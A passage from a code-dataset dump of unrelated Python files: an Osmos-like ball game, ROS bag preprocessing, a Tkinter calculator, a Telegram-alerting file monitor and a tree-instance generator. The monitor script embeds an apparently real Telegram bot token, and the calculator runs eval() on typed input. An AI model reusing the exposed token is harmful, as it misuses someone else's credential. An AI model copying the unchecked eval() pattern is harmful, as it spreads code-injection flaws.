\"Speed\"): # Specify the power up received\n velocity_limit: int = 10\n\n #^ Keyboard Controls:\n if (self.keyboard.right) and (self.player.velocity.get_p()[0] < velocity_limit) and (self.player.move): #* Right\n self.player.velocity.add(Vector(1, 0))\n self.eject_mass()\n if (self.keyboard.left) and (self.player.velocity.get_p()[0] > -velocity_limit) and (self.player.move): #* Left\n self.player.velocity.add(Vector(-1, 0))\n self.eject_mass()\n if (self.keyboard.up) and (self.player.velocity.get_p()[1] > -velocity_limit) and (self.player.move): #* Up\n self.player.velocity.add(Vector(0, -1))\n self.eject_mass()\n if (self.keyboard.down) and (self.player.velocity.get_p()[1] < velocity_limit) and (self.player.move): #* Down \n self.player.velocity.add(Vector(0, 1))\n self.eject_mass()\n\n def eject_mass(self) -> None: \n \"\"\"Each time the player manually moves mass is created. \n Mass will move in the opposite direction to emulate Newton's Laws. \n\n The mass is spawned on the opposite side of the direction of the player object. \n The formula `(player radius + mass radius) × (- player velocity / |player velocity|)` finds the opposite circumference which is the position of mass object. \n\n When player moves in the opposite direction, the velocity of the mass could become 0 which will cause error. \n An if statement checks if the `x` or `y` are 0 and increments if condition is met. #\n\n Once the calculation is complete, a mass object is added to the list. \n It takes the position calculated before, the negative velocity of player (opposite direction) and the colour. \n \n The player loses the mass which.\n Each move will cause the player to lose 1 from the radius. \n Each mass is 0.2 radii and 5 are created for each movement. \n \"\"\"\n mass_velocity: Vector = self.player.velocity.copy().negate() # Velocity of the mass is the opposite direction from the player, therefore velocity is negated. 
\n mass_radius: float = 0.2\n\n if (mass_velocity.get_p()[0] == 0): # Checks if the x component of the velocity is 0\n mass_velocity += Vector(1, 0) # Increment 1 to x component to avoid errors later on\n elif (mass_velocity.get_p()[1] == 0): # Checks if the y component of the velocity is 0\n mass_velocity += Vector(0, 1) # Increment 1 to y component to avoid errors later on\n\n mass_velocity_unit = mass_velocity.copy().divide(mass_velocity.length()) # Unit Vector = Vector / |Vector|\n mass_position = ((self.player.radius + mass_radius) * mass_velocity_unit) + self.player.position.copy() # Computes the actual position of the mass\n\n self.mass.append(Mass((mass_position), mass_velocity, mass_radius)) # Creates a new mass object which is added to the list\n self.player.set_radius(self.player.radius - mass_radius) # Decrements the radius of the player \n\n def update_enemy(self):\n \"\"\"Update the enemies. \n Method handles the updating the position of the enemies and bouncing upon collision with walls. \n To update the position of the enemy, the update method of the enemy object itself is called. \n Method also checks the state of the enemies by checking if there have been collisions (`hit()` method) with other enemies, mass or the player. \n When enemies get close to other enemies or mass, gravity is applied on the two objects. \n If there have been collisions that the appropriate ball is engulfed. \n \n Enemies are stored in a list of enemies. \n This means that each enemy is the list is handles individually by iterating over the list. \n A for loop is used to iterate over each enemy and carry out the operations and checks mentioned before. \n\n Calls:\n `Enemy.update()`: handles updating the position of the enemy object. \n `self.bounce(enemy)`: handles the updating the velocity of the enemy upon collision with wall. \n `self.hit(enemy, enemy2)`: detects collision of the enemy with another ball (enemy, player).\n `self.gravity(ball1, ball2)`: attracts two balls together. \n `self.engulf(enemy, enemy2)`: once there has been a collision, bigger ball will engulf the smaller ball. \n \"\"\"\n for enemy in self.enemy: # For each enemy object in the enemy list\n enemy.update() # Update the ball (moves the ball)\n self.bounce(enemy) # Bounce the ball if there is a collision \n \n #^ Checking Collision with Player\n if self.hit_ball(self.player, enemy): # Check if there has been a collision between player and enemy\n self.engulf(self.player, enemy) # If true, the one of the two objects is engulfed\n \n #^ Checking Collision with other Enemy\n for enemy2 in self.enemy: # Check collision with other enemies for each enemy in the list\n if enemy != enemy2: # Only execute when the two balls are different.#* Same balls are always colliding\n self.gravity(enemy, enemy2) # Gravity acts on the balls\n if self.hit_ball(enemy, enemy2): # Check if there has been a collision between 2 enemies\n self.engulf(enemy, enemy2) # If there has been a collision then engulf method is called\n\n #^ Checking Collision with Mass:\n for mass in self.mass: # For loop used to iterate over each mass object in the list\n self.gravity(enemy, mass) # Gravity acts on the mass and enemy\n if self.hit_ball(enemy, mass): # Check if there has been a collision between current mass and current enemy\n self.engulf(enemy, mass) # If true then mass is engulfed by the enemy\n\n def enemy_split(self):\n \"\"\"Splits the enemy objects into smaller ones. \n When the method is called, a random enemy will be split. 
\n This is done by splitting a selecting a random number from the first to last index from list where enemies are stored. \n If the radius is too small, then the enemy is not split. Otherwise, the enemies will become too small. \n\n When splitting, the enemy will become slower. \n To counter this, the velocity is multiplied. \n This also means that the new enemy will be faster. \n The enemies will get exponentially fast. \n A limiter is implemented so that the velocity is not increased once the speed (not velocity only magnitude) limit is reached. \n\n The radius of the new enemy object is random from range `5` to 5 less than the radius of the current enemy. \n The range cannot be too small otherwise the new enemy will be too small and the current enemy will not decrease that much. \n Once a radius is picked, the radius of the current enemy will be decreased by the same amount. \n\n The new enemy is spawned on the opposite side of the direction of the current enemy object. \n The formula `(current enemy radius + new enemy radius) × (-current velocity / |current velocity|)` finds the opposite circumference which is the position of new enemy object. \n\n When current enemy moves in the opposite direction, the velocity of the new enemy could become 0 which will cause error. \n An if statement checks if the `x` or `y` are 0 and increments if condition is met. \n\n Once the calculation is complete, a new enemy object is added to the list. \n It takes the position calculated before, the negative velocity of current enemy (opposite direction) and the radius. \n \"\"\"\n #^ Random Enemy:\n enemy: Enemy = self.enemy[random.randint(0, len(self.enemy) - 1)]\n \n #^ Splitting Enemy:\n if (enemy.radius >= 15): # Only splits when the radius is less than 15\n if (enemy.velocity.length() < 5): # Checks if the speed is less than 5\n enemy.velocity.multiply(1.5) # Multiply the speed 1.5 to supplement the decrease in speed \n \n mass_velocity: Vector = enemy.velocity.copy().negate() \n new_enemy_radius:int = random.randint(5, floor(enemy.radius - 5)) # New enemy radius is random\n\n if (mass_velocity.get_p()[0] == 0): # Checks if the x component of the velocity is 0\n mass_velocity += Vector(1, 0) # Increment 1 to x component to avoid errors later on\n elif (mass_velocity.get_p()[1] == 0): # Checks if the y component of the velocity is 0\n mass_velocity += Vector(0, 1) # Increment 1 to y component to avoid errors later on\n\n mass_velocity_unit: Vector = mass_velocity.copy().divide(mass_velocity.length()) # Unit Vector = Vector / |Vector|\n mass_position: Vector = ((enemy.radius + new_enemy_radius) * mass_velocity_unit) + enemy.position.copy() # Computes the actual position of the new enemy\n\n self.enemy.append(Enemy(mass_position, mass_velocity, new_enemy_radius)) # Creates a new enemy object which is added to the list\n enemy.set_radius(enemy.radius - new_enemy_radius) # Decrements the radius of the player \n \n def update_mass(self) -> None:\n \"\"\"Update the mass. \n Method handles updating the position of the mass and bouncing upon collision with walls. \n To update the position of the mass, the update method of the mass object itself is called. \n Method also checks the state of the mass by checking if there have been collisions (`hit()` method) with enemies or the player. \n Mass cannot engulf another mass to prevent mass from engulfing player and enemies. Mass is always engulfed. \n If there has been a collision, then the mass object is engulfed. 
\n        \"\"\"\n        for mass in self.mass: # For each mass object in the mass list\n            mass.update() # Move the ball\n            self.bounce(mass) # Bounce mass upon collision with wall\n            \n            if self.hit_ball(mass, self.player): # Check if there has been a collision with the player\n                self.engulf(self.player, mass) # If true, then the player object will engulf the mass\n        \n    def update_power_ups(self) -> None:\n        \"\"\"Checks if a power up object has collided with the player object. \n        A for loop is used to iterate over the list of power ups. \n        For each power up object, it is checked whether there has been a collision. \n        If there has been a collision, then the player object receives a power up and the current power up object is removed from the list. \n        Once the player receives the power up, the timer which defines how long it will last is started. \n        \"\"\"\n        for power_up in self.power_ups: # Iterate over the power up objects in the list\n            if self.hit_ball(self.player, power_up): # Check if the current power up has collided with the player\n                self.power_ups.remove(power_up) # Remove the power up from the list\n                self.player.power_up = \"Speed\" # Makes the player faster\n                self.player_power_up_timer.start() # Starts the timer for how long the power up lasts\n\n    def add_power_up(self) -> None:\n        \"\"\"Creates power up objects. \n        This is called from `self.power_up_timer_create` which will create a new power up at a set time interval. \n        The maximum number of power ups is 5, after which point no more power ups will be added. \n        An if statement is used to check if the number of power ups (in the list) is below the maximum limit. \n        If it is below the limit, then a new power up object is spawned at a random location within the map. \n        \"\"\"\n        max_number_power_ups: int = 5\n        if (len(self.power_ups) < max_number_power_ups): # Checks if the number of power ups in the map is less than the maximum allowed\n            self.power_ups.append(Power_Up(Vector(random.randint(5, 790), random.randint(5, 490)))) # Create a new power up at a random place within the map\n\n    def countdown(self):\n        \"\"\"Counts down the timer set.\n        This method decrements the time limit for the game. \n        Each time this is called from `self.time_count` the time limit decreases. \n        Other methods will check this `self.time_limit` to execute the required actions. \n        \"\"\"\n        self.time_limit -= 1\n\n    def reset_player_power_up(self) -> None:\n        \"\"\"Resets the player power up. \n        Called from the `self.player_power_up_timer` timer. \n        \"\"\"\n        self.player.power_up = \"None\" # Reset the power up (no more power up)\n        self.player_power_up_timer.stop() # Stops the timer (until a new power up is received)\n\n    #^ Mechanics:\n    def gravity(self, ball1: Ball, ball2: Ball) -> None:\n        \"\"\"Gravity method attracts the smaller ball towards the bigger ball. \n        The method compares the radii of the two balls to find out the smaller and larger ball. \n        Gravity will act on the smaller ball when it is within a certain range of the bigger ball. \n        The velocity of both balls changes. \n        However, the velocity of the smaller ball changes more drastically than the bigger one. \n        The gravitational force of the smaller ball on the larger one is 5 times weaker. \n\n        The gravitational force constant dictates the strength of the gravity.\n        The distance is computed by comparing the centers of the two balls, which is used to check if the smaller ball is within the range. 
\n\n        Args:\n            `ball1 (Ball)`: one of the balls on which gravity could act.\n            `ball2 (Ball)`: one of the balls on which gravity could act.\n        \"\"\"\n        gravitational_force: int = 700 # Smaller means stronger\n        distance_between_balls: int = int((ball1.position.copy().subtract(ball2.position)).length())\n        larger_ball: Ball = ball1\n        smaller_ball: Ball = ball2 # Gravity acts on the smaller ball\n\n        #^ Computing Larger & Smaller Ball\n        if (ball1.radius < ball2.radius): # Works out the larger and smaller ball\n            larger_ball: Ball = ball2\n            smaller_ball: Ball = ball1\n        gravity_distance: int = larger_ball.radius * 5\n        \n        #^ Gravity\n        if (distance_between_balls < (gravity_distance)): # Gravity acts when the smaller ball is inside the gravitational range of the bigger ball\n            smaller_ball.velocity.add((larger_ball.position - smaller_ball.position).divide(gravitational_force)) # Smaller ball velocity changed\n            larger_ball.velocity.add((smaller_ball.position - larger_ball.position).divide(gravitational_force * 5)) # Bigger ball velocity changed (5 times weaker)\n        \n    def hit_ball(self, ball1: Ball, ball2: Ball) -> bool:\n        \"\"\"Detects collision between 2 balls. \n        Method computes the distance between the two centers of the balls. \n        The distance is compared with the sum of the radii of the balls. \n        If the distance between the centers is less than the sum of the radii then there has been a collision. \n        \n        The caller can then use the engulf method so that the larger ball will engulf the smaller ball. \n        \n        Args:\n            `ball1 (Ball)`: enemy.\n            `ball2 (Ball)`: can be enemy, player or mass.\n        \n        Returns:\n            `(Boolean)`: whether a collision has occurred.\n        \"\"\"\n        distance: Vector = ball1.position.copy().subtract(ball2.position)\n        return (distance.length() < (ball1.radius + ball2.radius)) # Check if the distance from the centres is less than the sum of radii\n\n    def engulf(self, ball1: Ball, ball2: Ball) -> None:\n        \"\"\"Engulf ball. \n        After a collision.\n        The sum of the radii is computed and stored in a variable, which is then set as the radius of the larger ball. \n        \n        If the second (smaller) ball is the enemy, \n        then it is removed from the list. \n        `self.increment_score()` is called to increment the score; \n        this method checks whether the larger ball was the player and the smaller ball was the enemy. \n        It is possible that both balls were enemies which means that the kill counter cannot be incremented. \n\n        If the second (smaller) ball is the player, \n        then the player is dead which means that the game is lost. \n\n        If the second (smaller) ball is the mass, \n        then it is removed from the list. \n        Mass will never eat another entity as mass does not get larger because it does not engulf other mass. \n        \n        Args:\n            `ball1 (Ball)`: main ball.\n            `ball2 (Ball)`: can be enemy or player.\n        \n        Calls:\n            `Ball.set_radius(sum)`: increases the size of the ball by setting the sum of the two radii on the bigger one. \n            `self.increment_score(larger_ball, smaller_ball)`: increments the score only if the player killed / engulfed the enemy. 
\n        \"\"\"\n        sum_radii: int = ball1.radius + ball2.radius\n        larger_ball: Ball = ball1\n        smaller_ball: Ball = ball2\n\n        #^ Computing Larger & Smaller Ball\n        if (ball1.radius < ball2.radius): # Works out the larger and smaller ball\n            larger_ball = ball2\n            smaller_ball = ball1\n\n        #^ Erasing Engulfed Ball\n        larger_ball.set_radius(sum_radii) # Sum of the radii set as the radius of the larger ball\n        \n        if (smaller_ball.type == \"Enemy\"): # If the ball eaten (smaller ball) was the enemy\n            self.enemy.remove(smaller_ball) # The ball is removed from the enemy list\n            self.increment_score(larger_ball, smaller_ball) # If the larger ball is the player and the smaller ball is the enemy then the score is incremented\n        elif (smaller_ball.type == \"Player\"): # If the ball eaten (smaller ball) was the player\n            self.player.alive = False # A method will check this and terminate the game\n        elif (smaller_ball.type == \"Mass\"): # Mass is removed from list\n            self.mass.remove(smaller_ball)\n\n    def bounce(self, ball: Ball) -> None:\n        \"\"\"Bounces the ball if there was a collision with the wall. \n        The minimum allowed distance is the sum of the ball radius and half the wall thickness. \n        The distance between the center of the ball and the wall is computed to check if there was a collision. \n        If the distance between the wall and the ball is less than the minimum allowed distance then there has been a collision. \n\n        The `in_collision` variable keeps track of whether there has been a collision before. \n        This is done to prevent the sticky problem where the ball is stuck in the wall. \n        If there is a previous collision and another one happens at the same time, then the collision is not handled and therefore there is no bounce. \n        After the collision takes place and there is no other collision, the variable is set to false so that the next collision can be handled. \n        \n        The ball is the super-class of enemy, player and mass.\n        This method will work for any sub-classes of ball. \n        \n        Args:\n            `ball (Ball)`: ball object which moves.\n        \n        Calls: \n            `Line.distance(ball)`: works out the distance between the wall and the ball object (player, enemy). \n            `Ball.bounce(line.normal)`: reflects the velocity of the ball along the normal to simulate a bounce. \n        \"\"\"\n        for line in self.lines: # For each line in the line list\n            distance = ball.radius + (line.thickness / 2) + 1 # Sum of the ball radius and half the wall thickness\n            if (line.distance(ball) < distance) and (ball.in_collision == False): # Collision: if the current distance of the center of the ball and the wall is less than the minimum distance and the collision has not been dealt with\n                ball.bounce(line.normal) # Call the bounce method from the ball object\n                ball.in_collision = True # Collision already dealt with therefore no sticky problem\n            else: # Where there is no collision\n                ball.in_collision = False # When there is no collision then set to false so that a bounce can happen later\n\n    #^ Game:\n    def increment_score(self, larger_ball: Ball, smaller_ball: Ball) -> None:\n        \"\"\"Increments the score if the player engulfs / kills an enemy. \n        This method is called from `self.engulf()` where the larger ball engulfs the smaller ball upon collision. \n        The score is incremented if the player kills the enemy. \n        For this to happen, the larger ball must be the player and the smaller ball must be the enemy. \n\n        An if statement is used to check the type of the two balls. \n        If the larger ball (which engulfed / killed) is the player and \n        the smaller ball (which was engulfed / killed) is the enemy then \n        the score is incremented. 
\n\n        This check is carried out because it is possible that both balls were enemies. \n        In this case, the kill counter cannot be incremented as the player has not killed any enemies but rather the enemies have merged. \n\n        Args:\n            larger_ball (Ball): larger ball which has engulfed the smaller ball. \n            smaller_ball (Ball): smaller ball which is engulfed / killed by the bigger ball. \n        \"\"\"\n        if (larger_ball.type == \"Player\") and (smaller_ball.type == \"Enemy\"): # Only if the player engulfed the enemy (from `self.engulf()` method)\n            self.kill_counter += 1 # Increment kill counter to be displayed on canvas by another method\n        \n    def game_finish(self) -> None:\n        \"\"\"Handles the end of the game.\n        Detects whether the game is finished. \n        Once the game is finished, the game will be terminated and the appropriate message will be displayed. \n        This is done by checking whether all the enemies are dead or the player is dead. \n        \n        To check if all the enemies are dead, the size of the list which contains the enemies is checked.\n        If the length of the list is 0 (empty list) then all the enemies are dead and the player has won. \n\n        To check if the player is dead, the field which keeps track of whether it is alive is checked. \n        If the field 'alive' is false, then the player is dead and therefore has lost. \n\n        The player will lose if it has not killed all the enemies by the time the timer runs out. \n        When the timer reaches 0, the timer has run out. \n        For the timer to be unlimited, the timer is set to be less than 0 (-1) which means that the condition is never met. \n\n        Checks whether the letter 'e' has been pressed. \n        If it has been pressed, the game will be terminated. \n\n        Calls:\n            `stop()`: terminates the game and all the handlers (timer, frame).\n        \"\"\"\n        if (len(self.enemy) == 0): # Checks if all the enemies are dead\n            self.stop()\n            print(\"You Won\")\n        elif (self.player.alive == False): # Checks if the player is dead\n            self.stop()\n            print(\"Game Over. You Lost.\")\n        elif (self.time_limit == 0): # Checks if the timer has run out\n            print(\"Ran Out of Time. You Lost\")\n            self.stop()\n        elif (self.keyboard.e): # Checks if the player exited the game by pressing 'e'\n            print(\"Game Exited\")\n            self.stop()\n\n    def stop(self) -> None:\n        \"\"\"Terminates all the handlers.\n        All the timers and the frame are terminated. \n        This terminates the game. \n        \"\"\"\n        self.frame.stop()\n        self.power_up_timer_create.stop()\n        self.time_count.stop()\n        self.player_power_up_timer.stop()\n        self.enemy_split_timer.stop()\n\n# A bug is present where the enemies will infinitely get larger if the player is eaten.\n# Terminating the game is a workaround. 
","repo_name":"mbeps/Osmos_Game","sub_path":"Game_Control/interactions.py","file_name":"interactions.py","file_ext":"py","file_size_in_byte":36236,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"31728619215","text":"import os\nimport numpy as np\nimport rosbag\nimport rospy\nimport matplotlib.pyplot as plt\nfrom plot_bag import *\n\ndef get_start_time(bag):\n t_prev = 0\n pos_prev = []\n count = 0\n t_start = 0\n\n for topic, msg, t in bag.read_messages('/tf'):\n if msg.transforms[0].child_frame_id == \"Puck\":\n pos = np.array([msg.transforms[0].transform.translation.x, msg.transforms[0].transform.translation.y, msg.transforms[0].transform.translation.z])\n t_sec = msg.transforms[0].header.stamp.to_sec()\n if t_prev != 0:\n vel = np.linalg.norm(pos - pos_prev) / np.abs(t_sec - t_prev)\n if vel > .06:\n if count == 0:\n t_start = t\n count += 1\n if count > 5:\n return t_start\n else:\n count = 0\n pos_prev = pos\n t_prev = t_sec\n\ndef write_in_bag(bag_origin, bag_write:rosbag.Bag, t_start):\n count = 0\n for topic, msg, t in bag_origin.read_messages(\"/tf\", t_start):\n time_stamp = rospy.Time(0) + (t - t_start) # create time instance with rospy.Time\n msg.transforms[0].header.stamp = time_stamp\n bag_write.write(topic, msg, time_stamp)\n count += 1\n bag_write.close()\n\n\n\nif __name__ == \"__main__\":\n\n bag_dir = \"/home/hszlyw/Documents/airhockey/20210224/long_side/\"\n dir_list = os.listdir(bag_dir)\n dir_list.sort()\n filenames = []\n for filename in dir_list:\n filenames.append(filename)\n # if not os.path.exists(bag_dir + \"edited\"):\n # os.mkdir(bag_dir + \"edited/\")\n for bag_name in filenames:\n # if bag_name == 'edited':\n # continue\n\n\n bag_name = \"2021-02-24-15-00-42.bag\"\n print(bag_name)\n\n bag = rosbag.Bag(os.path.join(bag_dir, bag_name))\n\n # write_obj = rosbag.Bag(os.path.join(bag_dir + \"edited\", bag_name), 'w')\n write_obj = rosbag.Bag(os.path.join(\"/home/hszlyw/Documents/airhockey/20210224/long_edited/\", bag_name), 'w')\n\n t_start = get_start_time(bag)\n # print(t_start.to_sec() - bag.get_start_time())\n write_in_bag(bag, write_obj, t_start)\n bag_after = rosbag.Bag(os.path.join(\"/home/hszlyw/Documents/airhockey/20210224/long_edited/\", bag_name))\n\n\n plotbag(bag, 'before')\n plotbag(bag_after, 'after')\n plt.legend()\n plt.show()\n None\n","repo_name":"Aniccam/System-Identification-in-Robot-Air-Hockey","sub_path":"iiwa_envs/dataprocessing/pre_process.py","file_name":"pre_process.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39382720933","text":"import tkinter as tk\nimport math\n\nbotao_config = {\n 'bg': '#242742',\n 'fg': '#d1d2de',\n 'font': ('Consolas bold', 12),\n 'height': '2',\n 'width': '7',\n 'relief': 'flat',\n 'activebackground': '#313454'\n}\n\ndigitos = ['√', 'x²', 'C', 'π!', 'sin', 'π',\n 'cos', 'tan', 'sin‾¹', 'cos‾¹', 'tan‾¹']\n\ndeg = 1\ninversa_deg = 1\ncnt = 0\n\n\nclass Calculadora:\n def __init__(self, master):\n self.master = master\n\n self.displayFrame = tk.Frame(self.master)\n self.displayFrame.pack()\n\n self.buttonsFrame = tk.Frame(self.master)\n self.buttonsFrame.pack()\n\n self.output = tk.Entry(self.displayFrame,\n width=30,\n relief='sunken',\n bd=3,\n font=('Consolas bold', 17),\n fg=\"#c9c9c5\",\n bg=\"#242742\")\n self.output.grid(row=0, column=0)\n self.criarBotoes()\n\n self.converte = tk.Button(self.displayFrame,\n botao_config, width=3, 
height=0, text='DEG',\n bg='#e35124', command=self.degreesRadian)\n\n self.converte.grid(row=0, column=1)\n\n self.criarBotoes()\n\n def criarBotoes(self):\n self.botoes = [\n ['√', 'x²', '**', '(', ')', '/'],\n ['sin', 'cos', '7', '8', '9', '+'],\n ['sin‾¹', 'cos‾¹', '4', '5', '6', '-'],\n ['tan', 'tan‾¹', '1', '2', '3', '*'],\n ['π!', 'π', '.', '0', '=', 'C']\n ]\n for linha in range(len(self.botoes)):\n for coluna in range(len(self.botoes[linha])):\n texto = self.botoes[linha][coluna]\n\n b = tk.Button(self.buttonsFrame, botao_config, text=texto,\n command=lambda x=texto: self.acaoBotoes(x))\n b.grid(row=linha, column=coluna)\n\n def acaoBotoes(self, texto):\n global deg\n global inversa_deg\n if texto != '=':\n if texto not in digitos:\n self.output.insert('end', texto)\n else:\n if texto == '√':\n self.addValor(math.sqrt(float(self.output.get())))\n elif texto == 'π!':\n self.addValor(math.factorial(float(self.output.get())))\n elif texto == 'x²':\n self.addValor(float(self.output.get()) ** 2)\n elif texto == 'C':\n self.addValor('')\n elif texto == 'π':\n self.addValor(3.1415926535897932)\n elif texto == 'sin':\n self.addValor(math.sin(float(self.output.get()) * deg))\n elif texto == 'cos':\n self.addValor(math.cos(float(self.output.get()) * deg))\n elif texto == 'tan':\n self.addValor(math.tan(float(self.output.get()) * deg))\n elif texto == 'sin‾¹':\n self.addValor(\n math.asin(float(self.output.get()) * inversa_deg))\n elif texto == 'cos‾¹':\n self.addValor(\n math.acos(float(self.output.get()) * inversa_deg))\n elif texto == 'tan‾¹':\n self.addValor(\n math.atan(float(self.output.get()) * inversa_deg))\n\n else:\n self.addValor(eval(self.output.get()))\n\n def addValor(self, valor):\n self.output.delete(0, 'end')\n self.output.insert('end', valor)\n\n def degreesRadian(self):\n global deg\n global inversa_deg\n global cnt\n\n if(cnt == 0):\n deg = math.pi / 180\n inversa_deg = 180 / math.pi\n self.converte['text'] = 'RAD'\n cnt = 1\n else:\n deg = 1\n inversa_deg = 1\n self.converte['text'] = 'DEG'\n cnt = 0\n\n\nraiz = tk.Tk()\n\nCalculadora(raiz)\n\nraiz.mainloop()\n","repo_name":"LucasGola/Basic-Scientific-Calculator-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"9338533333","text":"import requests\r\nimport re\r\nimport filecmp\r\nimport time\r\nimport json\r\nfrom apscheduler.schedulers.blocking import BlockingScheduler\r\nimport urllib\r\n\r\nfrom telegram import Bot\r\n#telegram机器人消息发送函数\r\ndef bot_function(a,message):\r\n bot = Bot(token=\"797169015:AAFV4OCUhrr3_QY1_aQjW1e7vX4W0rkjOgI\")\r\n # -242222752为技术监控群\r\n #-288137810为机器人测试群\r\n bot.send_message(-288137810,a,message)#-242222752为技术监控群\r\nimport os\r\n# def job():\r\nwhile True:\r\n url_base_list = ['https://images.slaxc.com/app/api/x999_ios.js','https://images.slaxc.com/app/api/88yh_ios.js',\r\n 'https://images.slaxc.com/app/api/999y_ios.js','https://images.slaxc.com/app/api/77js_ios.js',\r\n 'https://images.slaxc.com/app/api/999h_ios.js']\r\n #print('begin')\r\n for url_base in url_base_list:\r\n time.sleep(1)\r\n html = requests.get(url_base)\r\n version = html.text\r\n link = re.findall(r'https://[a-zA-Z0-9.?/&_&-:]*',version)\r\n for li in link:\r\n time.sleep(1)\r\n message1 = requests.get(li).text\r\n filename1 = li.split(\"/\")\r\n #print(filename1)\r\n fileame = filename1[len(filename1) - 1 ]\r\n #print(fileame)\r\n filepath = fileame + '.txt'\r\n f = 
open(filepath,'w')\r\n f.write(message1)\r\n f.close()\r\n if os.path.exists(filepath):\r\n new_filepath = fileame + 'a' + '.txt'\r\n f = open(new_filepath,'w')\r\n f.write(message1)\r\n f.close()\r\n result = filecmp.cmp(filepath,new_filepath)\r\n if result == True:\r\n os.remove(new_filepath)\r\n else:\r\n bot_function(new_filepath,'检测到手机版本异常,请及时处理')\r\n\r\n# scheduler = BlockingScheduler()\r\n# scheduler.add_job(job,'interval',seconds=300)\r\n# scheduler.start()\r\n\r\n\r\n","repo_name":"myself521/study","sub_path":"app_monitor.py","file_name":"app_monitor.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"36823371613","text":"import os\n\nfrom dynaff.inputs import rndtree_metric\nimport numpy as np\nimport argparse\nimport sys\nfrom pathlib import Path\n\n\nclass CreateGenerators:\n \"\"\"\n Create Random Number Generators\n\n :param N: Number of Instances generated\n :param Load: Selection fLag for load on experiment or create one\n :param grid: Array of Total Tree Nodes [10 20 30]\n :param n_seeds: Number of existing experiment seeds\n :param exp_selected: Selected Experiment\n \"\"\"\n def __init__(self, grid, N, Load, defpath=None):\n self.N = N\n self.Load = Load\n self.grid = grid\n self.n_seeds = 0\n self.exp_selected = 0\n\n if defpath is None:\n path = Path.cwd() / 'Experiments' / \"Seeds\"\n else:\n path=Path(defpath)\n\n # Generate a Seed_Sequence with default entropy\n if self.Load in ('no', 'false', 'f', 'n', '0'):\n self.rnd_sq = np.random.SeedSequence()\n with open(path, 'r') as fp:\n self.n_seeds = len(fp.readlines())\n print(\"Generating New Seed Sequence: {s}\".format(s=self.rnd_sq.entropy))\n # Select from current seed directory to reproduce experiment\n else:\n print(\"Loading a Seed Sequence\")\n if not path.exists() or not path.is_file():\n raise ValueError('Experiment Path either does not exists or is not a File')\n file = open(path, 'rt')\n # Display Seeds with their selection index\n f = file.readlines()\n for line in f:\n print(line)\n self.n_seeds += 1\n file.close()\n\n while True:\n select = int(input(\"Insert index for desired seed to reproduce experiment: \"))\n self.exp_selected = select\n if select >= 0 and select < self.n_seeds:\n break\n print('Error: {} is not a valid option, please try again'.format(select))\n print(\"\\nYou have selected experiment: {}\".format(f[select]))\n\n self.grid = f[select].split()[2]\n self.N = int(f[select].split()[3])\n self.rnd_sq = np.random.SeedSequence(int(f[select].split()[1]))\n\n grid_ = [int(element) for element in self.grid.split(\",\")]\n self.experiments = len(grid_)\n self.total_instances = self.experiments * self.N\n\n def Create(self):\n children = self.rnd_sq.spawn(self.total_instances) # Spawn children for every instance\n generators = [np.random.default_rng(s) for s in children] # Create default generators for each instance\n return generators, self.rnd_sq, self.grid, self.N, self.n_seeds, self.exp_selected\n\n\ndef argParser(args):\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\\\n Generate Experiment Instances or Load a seed to reproduce \n previously created instances.\n ''',\n epilog='''python InstanceGenerator.py -l f -g 10,20,30,40 -s 5'''\n )\n\n parser.add_argument(\n '--load', '-l', type=str,\n help=\"Load Experiments or Create New One\")\n parser.add_argument(\n '--grid', '-g', type=str,\n help=\"Set of experiments Tree size\")\n 
parser.add_argument(\n '--size', '-s', type=int,\n help=\"Number o instances for each node size\")\n\n return parser.parse_known_args(args)[0]\n\n\nif __name__ == '__main__':\n args = argParser(sys.argv[:])\n Generator = CreateGenerators(args.grid, args.size, args.load)\n rnd_generators, sq, grid, N, n_seeds, exp_selected = Generator.Create()\n\n # Create New Experiment and save seed for reproducibility\n if args.load in ('no', 'false', 'f', 'n', '0','False'):\n # Experiment save example: [5 3435464535 10,20,30 10]\n exp_string = str(n_seeds) + \" \" + str(sq.entropy) + \" \" + str(grid) + \" \" + str(N) + \"\\n\"\n fle = Path('Experiments/Seeds')\n # Create seed file if not exist\n fle.touch(exist_ok=True)\n # Write Experiment string\n seeds_file = open(fle,'a')\n seeds_file.write(exp_string)\n seeds_file.close()\n # Create Master Experiment Path if is new\n n_experiments = len(next(os.walk('Experiments'))[1]) # Get number of next number of experiment\n master_path = \"Experiments/Experiment_\" + str(n_experiments)\n if os.path.exists(master_path) == False:\n os.mkdir(master_path)\n else:\n master_path = \"Experiments/Experiment_\" + str(exp_selected)\n if os.path.exists(master_path) == False:\n os.mkdir(master_path)\n\n\n # Convert grid string to array\n grid = [int(element) for element in grid.split(\",\")]\n\n # Experiment Environment Parameters\n exp_config = {}\n exp_config['experiment'] = {}\n exp_config['experiment']['env_type'] = 'rnd_tree'\n exp_config['experiment']['env_metric'] = 'metric'\n exp_config['experiment']['instances'] = N\n # Configurable Experiment Parameters\n exp_config['experiment']['scale'] = 7\n exp_config['experiment']['root_degree'] = 3\n exp_config['experiment']['Env_Update'] = 1\n exp_config['experiment']['delta'] = [.25,.50] # [A,B] We want agent at a distance between A% - B% of total scale\n ############################################\n c = 0\n # Create N instances for each Tree Size Experiment in Grid\n for n_nodes in grid:\n node_path = master_path + \"/\" + 'Size_' + str(n_nodes) + '/'\n if not os.path.exists(node_path):\n os.mkdir(node_path)\n file = 'img_' + str(n_nodes)\n batch_generators = rnd_generators[c:c + N] # Partition Generators total/N\n input = rndtree_metric(exp_config, node_path, file, n_nodes, batch_generators)\n c += N","repo_name":"MauMontenegro/Firefighter_Problem","sub_path":"InstanceGenerator.py","file_name":"InstanceGenerator.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73801419766","text":"from socket import *\nimport struct\nimport time\n\nhost = 'localhost'\nport = 123\n\nsock = socket(AF_INET, SOCK_DGRAM)\nsock.sendto(b'',(host, port))\ndata = sock.recvfrom(1024)\nt = 